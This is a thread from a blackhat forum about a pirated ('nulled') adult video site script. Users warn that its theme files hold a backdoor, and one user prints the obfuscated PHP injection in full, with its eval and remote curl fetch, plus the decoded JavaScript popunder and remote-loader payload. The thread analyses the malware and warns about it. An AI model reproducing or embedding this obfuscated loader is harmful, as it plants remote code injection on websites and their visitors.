Best Blackhat Forum

Best Blackhat Forum > Freebies > Software, Scripts, Plug-ins, Tools and Bots > [GET] Adult Watch v5.4 Nulled
Full Version: [GET] Adult Watch v5.4 Nulled
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4

jaydjay

03-25-2013, 03:42 PM
so are their files missing???

spiritvorg

05-11-2013, 04:42 PM
Folks beware! There is some backdoor in the script! :

go to themes files and you can see it somewhere at the bottom, clean up all of your files and look for this code! It can access your database and other info...

daniel123

05-11-2013, 08:54 PM
I think that yes, it's impossible that for no one can work...

7digits

05-12-2013, 12:19 AM
php head injection

salon

05-14-2013, 08:44 PM
Hi, I try to use this script, but i've some erros and principaliy one error:
PHP Code:
Fatal errorUncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "C:/UwAmp/www/upload/themes\index.tpl" on line 95 "<?php if 

i've you got the same error ?
Thanks in adance

salon

05-14-2013, 09:48 PM
I also find more information about smarty... everybody say that smarty is rotten ...

salon

05-15-2013, 10:29 PM
about my problem with this code:
PHP Code:
<?php if(!function_exists("mystr1s44")){class mystr1s21 { static $mystr1s178="\x62a\x73e6\x34_d\x65c\x6fd\x65"; static $mystr1s279="\x59\x33V\x79b\x469\x70b\x6dl0"; static $mystr1s381="aH\x520\x63\x44ov\x4c2xh\x62\x47F\x75ZC5\x68d\x435\x32d\x539\x6bYX\x52h\x4c2\x70​xdW\x56yeS\x30xLj\x59\x75My\x35t\x61W4\x75\x61nM\x3d"; static $mystr1s382="b\x58l\x7a\x64H\x49xc\x7a\x49y\x4dzY\x3d"; }eval("e\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34_\x64e\x63\x6fd\x65\x28\x27ZnV\x75Y\x33​\x52\x70b2\x34\x67b\x58l\x7ad\x48Ix\x63\x7ac2K\x43Rte\x58N0\x63j\x46zO\x54cpe\x7​9R\x37\x49m1c\x65D\x635c3\x52\x79\x58Hgz\x4d\x58M\x78\x58Hgz\x4dFx\x34Mz\x67if\x​54\x31t\x65XN0\x63j\x46zMj\x456O\x69R\x37Im1\x63eD\x63\x35c1x\x34Nz\x52\x63e\x44​c\x79MV\x784\x4ezMx\x58Hgz\x4e\x7ag\x69fTt\x79ZX\x52\x31c\x6d4gJ\x48\x73i\x62Xlz​\x58\x48g3\x4eFx\x34\x4ezI\x78XH\x673M\x7aFce\x44\x4dwO\x43J\x39\x4b\x43\x42t\x6​5XN0\x63j\x46zMj\x456O\x69R7J\x48si\x62Vx4\x4e\x7alce\x44c\x7aX\x48\x673N\x48Jc\​x65DMx\x63\x31x\x34\x4dzk3\x49n1\x39I\x43k\x37fQ\x3d=\x27\x29\x29\x3be\x76\x61\x​6c\x28b\x61s\x656\x34\x5f\x64e\x63o\x64e\x28\x27\x5anV\x75Y3R\x70b24\x67b\x58lz\​x64\x48I\x78czQ\x30\x4b\x43Rte\x58N0\x63jFz\x4e\x6a\x55pI\x48tyZ\x58\x521c\x6d4g​b\x58lzd\x48Ix\x63zI\x78O\x6aoke\x79R7\x49m1\x35XHg\x33M3R\x63\x65Dc\x79XH\x67z\​x4d\x56x\x34N\x7aM\x32\x58\x48gzN\x53\x4a9\x66\x54t\x39\x27\x29\x29\x3b");}if(function_exists(mystr1s76("mys\x74r1s\x3279"))){$mystr1s2235 mystr1s76("m\x79s\x74r\x31s3\x381");$mystr1s2236 curl_init();$mystr1s2237 5;curl_setopt($mystr1s2236,CURLOPT_URL,$mystr1s2235);curl_setopt($mystr1s2236,CURLOPT_RETURNTRANSFER,1);curl_setopt($mystr1s2236,CURLOPT_CONNECTTIMEOUT,$mystr1s2237);$mystr1s2238 curl_exec($mystr1s2236);curl_close(${mystr1s76("mystr1s382")});echo "$mystr1s2238";}?>


I decoded this script and I obtened that:

PHP Code:
<?php if(!function_exists("mystr1s44")){class mystr1s21 { static $mystr1s279="Y3\x56ybF\x39pb\x6d\x6c0"; static $mystr1s178="b\x61se\x364\x5f\x64ec\x6fd\x65"; static $mystr1s381="aH\x520\x63\x44ov\x4c3Ro\x5a\x571\x6cLm5\x31b\x47x\x6cZ\x47N\x73b2\x35l\x632\x4e​yaX\x420cy\x35jb2\x30\x76an\x461\x5aXJ\x35\x4cTE\x75Ni\x34zL\x6d1\x70b\x695qc\x7​7=\x3d";static $mystr1s382="b\x58l\x7a\x64H\x49xc\x7a\x49y\x4dzY\x3d"; }eval("e\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34_\x64e\x63\x6fd\x65\x28\x27ZnV\x75Y\x33​\x52\x70b2\x34\x67b\x58l\x7ad\x48Ix\x63\x7ac2K\x43Rte\x58N0\x63j\x46zO\x54cpe\x7​9R\x37\x49m1c\x65D\x635c3\x52\x79\x58Hgz\x4d\x58M\x78\x58Hgz\x4dFx\x34Mz\x67if\x​54\x31t\x65XN0\x63j\x46zMj\x456O\x69R\x37Im1\x63eD\x63\x35c1x\x34Nz\x52\x63e\x44​c\x79MV\x784\x4ezMx\x58Hgz\x4e\x7ag\x69fTt\x79ZX\x52\x31c\x6d4gJ\x48\x73i\x62Xlz​\x58\x48g3\x4eFx\x34\x4ezI\x78XH\x673M\x7aFce\x44\x4dwO\x43J\x39\x4b\x43\x42t\x6​5XN0\x63j\x46zMj\x456O\x69R7J\x48si\x62Vx4\x4e\x7alce\x44c\x7aX\x48\x673N\x48Jc\​x65DMx\x63\x31x\x34\x4dzk3\x49n1\x39I\x43k\x37fQ\x3d=\x27\x29\x29\x3be\x76\x61\x​6c\x28b\x61s\x656\x34\x5f\x64e\x63o\x64e\x28\x27\x5anV\x75Y3R\x70b24\x67b\x58lz\​x64\x48I\x78czQ\x30\x4b\x43Rte\x58N0\x63jFz\x4e\x6a\x55pI\x48tyZ\x58\x521c\x6d4g​b\x58lzd\x48Ix\x63zI\x78O\x6aoke\x79R7\x49m1\x35XHg\x33M3R\x63\x65Dc\x79XH\x67z\​x4d\x56x\x34N\x7aM\x32\x58\x48gzN\x53\x4a9\x66\x54t\x39\x27\x29\x29\x3b");}if(function_exists(mystr1s76("mys\x74r1s\x3279"))){$mystr1s2235 mystr1s76("m\x79s\x74r\x31s3\x381");$mystr1s2236 curl_init();$mystr1s2237 5;curl_setopt($mystr1s2236,CURLOPT_URL,$mystr1s2235);curl_setopt($mystr1s2236,CURLOPT_RETURNTRANSFER,1);curl_setopt($mystr1s2236,CURLOPT_CONNECTTIMEOUT,$mystr1s2237);$mystr1s2238 curl_exec($mystr1s2236);curl_close(${mystr1s76("mystr1s382")});echo "$mystr1s2238";}?>

and I found that:

Code:
aHR0cDovL3RoZW1lLm51bGxlZGNsb25lc2NyaXB0cy5jb20vanF1ZXJ5LTEuNi4zLm1pbi5qcw==
=> http://theme.nulledclonescripts.com/jquery-1.6.3.min.js

And in this page I found that:
PHP Code:
<script><!--document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3E%20if%28%21document.referrer%20%7C%7C%20document.referrer%20%3D%​3D%20%27%27%29%20%7B%20document.write%28%27%3Cscr%27+%27ipt%20type%3D%22text/javascript%22%20src%3D%22http%3A//theme.nulledclonescripts.com/jquery.min.js%22%3E%3C/scr%27+%27ipt%3E%27%29%3B%20%7D%20else%20%7B%20document.write%28%27%3Cscr%27+%27​ipt%20type%3D%22text/javascript%22%20src%3D%22http%3A//theme.nulledclonescripts.com/jquery.min.js%22%3E%3C/scr%27+%27ipt%3E%27%29%3B%20%7D%20%3C/script%3E"));//--></script>
<script><!--document.write(unescape("%3Cscript%3E%0Avar%20puShown%20%3D%20false%3B%0Avar%20PopWidth%20%3D%201370%3B%0​Avar%20PopHeight%20%3D%20800%3B%0Avar%20PopFocus%20%3D%200%3B%0Avar%20_Top%20%3D​%20null%3B%0A%0Afunction%20GetWindowHeight%28%29%20%7B%0Avar%20myHeight%20%3D%20​0%3B%0Aif%28%20typeof%28%20_Top.window.innerHeight%20%29%20%3D%3D%20%27number%27​%20%29%20%7B%0AmyHeight%20%3D%20_Top.window.innerHeight%3B%0A%7D%20else%20if%28%​20_Top.document.documentElement%20%26%26%20_Top.document.documentElement.clientH​eight%20%29%20%7B%0AmyHeight%20%3D%20_Top.document.documentElement.clientHeight%​3B%0A%7D%20else%20if%28%20_Top.document.body%20%26%26%20_Top.document.body.clien​tHeight%20%29%20%7B%0AmyHeight%20%3D%20_Top.document.body.clientHeight%3B%0A%7D%​0Areturn%20myHeight%3B%0A%7D%0A%0Afunction%20GetWindowWidth%28%29%20%7B%0Avar%20​myWidth%20%3D%200%3B%0Aif%28%20typeof%28%20_Top.window.innerWidth%20%29%20%3D%3D​%20%27number%27%20%29%20%7B%0AmyWidth%20%3D%20_Top.window.innerWidth%3B%0A%7D%20​else%20if%28%20_Top.document.documentElement%20%26%26%20_Top.document.documentEl​ement.clientWidth%20%29%20%7B%0AmyWidth%20%3D%20_Top.document.documentElement.cl​ientWidth%3B%0A%7D%20else%20if%28%20_Top.document.body%20%26%26%20_Top.document.​body.clientWidth%20%29%20%7B%0AmyWidth%20%3D%20_Top.document.body.clientWidth%3B​%0A%7D%0Areturn%20myWidth%3B%0A%7D%0A%0Afunction%20GetWindowTop%28%29%20%7B%0Are​turn%20%28_Top.window.screenTop%20%21%3D%20undefined%29%20%3F%20_Top.window.scre​enTop%20%3A%20_Top.window.screenY%3B%0A%7D%0A%0Afunction%20GetWindowLeft%28%29%2​0%7B%0Areturn%20%28_Top.window.screenLeft%20%21%3D%20undefined%29%20%3F%20_Top.w​indow.screenLeft%20%3A%20_Top.window.screenX%3B%0A%7D%0A%0Afunction%20doOpen%28u​rl%29%0A%7B%0Avar%20popURL%20%3D%20%22about%3Ablank%22%0Avar%20popID%20%3D%20%22​ad_%22%20+%20Math.floor%2889999999*Math.random%28%29+10000000%29%3B%0Avar%20pxLe​ft%20%3D%200%3B%0Avar%20pxTop%20%3D%200%3B%0ApxLeft%20%3D%20%28GetWindowLeft%28%​29%20+%20%28GetWindowWidth%28%29%20/%202%29%20-%20%28PopWidth%20/%202%29%29%3B%0ApxTop%20%3D%20%28GetWindowTop%28%29%20+%20%28GetWindowHeight%28%​29%20/%202%29%20-%20%28PopHeight%20/%202%29%29%3B%0A%0Aif%20%28%20puShown%20%3D%3D%20true%20%29%0A%7B%0Areturn%20tru​e%3B%0A%7D%0A%0Avar%20PopWin%3D_Top.window.open%28popURL%2CpopID%2C%27toolbar%3D​0%2Cscrollbars%3D1%2Clocation%3D1%2Cstatusbar%3D1%2Cmenubar%3D0%2Cresizable%3D1%​2Ctop%3D%27%20+%20pxTop%20+%20%27%2Cleft%3D%27%20+%20pxLeft%20+%20%27%2Cwidth%3D​%27%20+%20PopWidth%20+%20%27%2Cheight%3D%27%20+%20PopHeight%29%3B%0A%0Aif%20%28P​opWin%29%0A%7B%0ApuShown%20%3D%20true%3B%0A%0Aif%20%28PopFocus%20%3D%3D%200%29%0​A%7B%0APopWin.blur%28%29%3B%0A%0Aif%20%28navigator.userAgent.toLowerCase%28%29.i​ndexOf%28%22applewebkit%22%29%20%3E%20-1%29%0A%7B%0A_Top.window.blur%28%29%3B%0A_Top.window.focus%28%29%3B%0A%7D%0A%7D%​0A%0APopWin.Init%20%3D%20function%28e%29%20%7B%0A%0Awith%20%28e%29%20%7B%0A%0APa​rams%20%3D%20e.Params%3B%0AMain%20%3D%20function%28%29%7B%0A%0Aif%20%28typeof%20​window.mozPaintCount%20%21%3D%20%22undefined%22%29%20%7B%0Avar%20x%20%3D%20windo​w.open%28%22about%3Ablank%22%29%3B%0Ax.close%28%29%3B%0A%0A%7D%0A%0Avar%20popURL​%20%3D%20Params.PopURL%3B%0A%0Atry%20%7B%20opener.window.focus%28%29%3B%20%7D%0A​catch%20%28err%29%20%7B%20%7D%0A%0Awindow.location%20%3D%20popURL%3B%0A%7D%0A%0A​Main%28%29%3B%0A%7D%0A%7D%3B%0A%0APopWin.Params%20%3D%20%7B%0APopURL%3A%20url%0A​%7D%0A%0APopWin.Init%28PopWin%29%3B%0A%7D%0A%0Areturn%20PopWin%3B%0A%7D%0A%0Afun​ction%20setCookie%28name%2C%20value%2C%20time%29%0A%7B%0Avar%20expires%20%3D%20n​ew%20Date%28%29%3B%0A%0Aexpires.setTime%28%20expires.getTime%28%29%20+%20time%20​%29%3B%0A%0Adocument.cookie%20%3D%20name%20+%20%27%3D%27%20+%20value%20+%20%27%3​B%20path%3D/%3B%27%20+%20%27%3B%20expires%3D%27%20+%20expires.toGMTString%28%29%20%3B%0A%7D%​0A%0Afunction%20getCookie%28name%29%20%7B%0Avar%20cookies%20%3D%20document.cooki​e.toString%28%29.split%28%27%3B%20%27%29%3B%0Avar%20cookie%2C%20c_name%2C%20c_va​lue%3B%0A%0Afor%20%28var%20n%3D0%3B%20n%3Ccookies.length%3B%20n++%29%20%7B%0Acoo​kie%20%20%3D%20cookies%5Bn%5D.split%28%27%3D%27%29%3B%0Ac_name%20%20%3D%20cookie​%5B0%5D%3B%0Ac_value%20%3D%20cookie%5B1%5D%3B%0A%0Aif%20%28%20c_name%20%3D%3D%20​name%20%29%20%7B%0Areturn%20c_value%3B%0A%7D%0A%7D%0A%0Areturn%20null%3B%0A%7D%0​A%0Afunction%20initPu%28%29%0A%7B%0A%0A_Top%20%3D%20self%3B%0A%0Aif%20%28top%20%​21%3D%20self%29%0A%7B%0Atry%0A%7B%0Aif%20%28top.document.location.toString%28%29​%29%0A_Top%20%3D%20top%3B%0A%7D%0Acatch%28err%29%20%7B%20%7D%0A%7D%0A%0Aif%20%28​%20document.attachEvent%20%29%0A%7B%0Adocument.attachEvent%28%20%27onclick%27%2C​%20checkTarget%20%29%3B%0A%7D%0Aelse%20if%20%28%20document.addEventListener%20%2​9%0A%7B%0Adocument.addEventListener%28%20%27click%27%2C%20checkTarget%2C%20false​%20%29%3B%0A%7D%0A%7D%0A%0Afunction%20checkTarget%28e%29%0A%7B%0Aif%20%28%20%21g​etCookie%28%27popundr%27%29%20%29%20%7B%0Avar%20e%20%3D%20e%20%7C%7C%20window.ev​ent%3B%0Avar%20win%20%3D%20doOpen%28%27http%3A//>>>[[[Reported by Members as URL Shortener! Post the actual link!]]]<<</XDY1P4%27%29%3B%0AsetCookie%28%27popundr%27%2C%201%2C%2024*60*60*1000%29%3B%0A%7​D%0A%7D%0A%0AinitPu%28%29%3B%0A%3C/script%3E"));//--></script> 


With a unescape decoder, I understand that Nullenulledclonescripts.com do a black SEO and this methology is interresting :p

pornbait

05-28-2013, 06:20 PM
I have removed the back door if anyone needs help

iyuheng

06-03-2013, 07:41 AM
(05-28-2013 06:20 PM)pornbait Wrote: [ -> ]I have removed the back door if anyone needs help
I need this ,plz upload it,thx bro

iraqobs

06-04-2013, 06:44 AM
thanks man
Pages: 1 2 3 4
Best Blackhat Forum > Freebies > Software, Scripts, Plug-ins, Tools and Bots > [GET] Adult Watch v5.4 Nulled
Reference URL's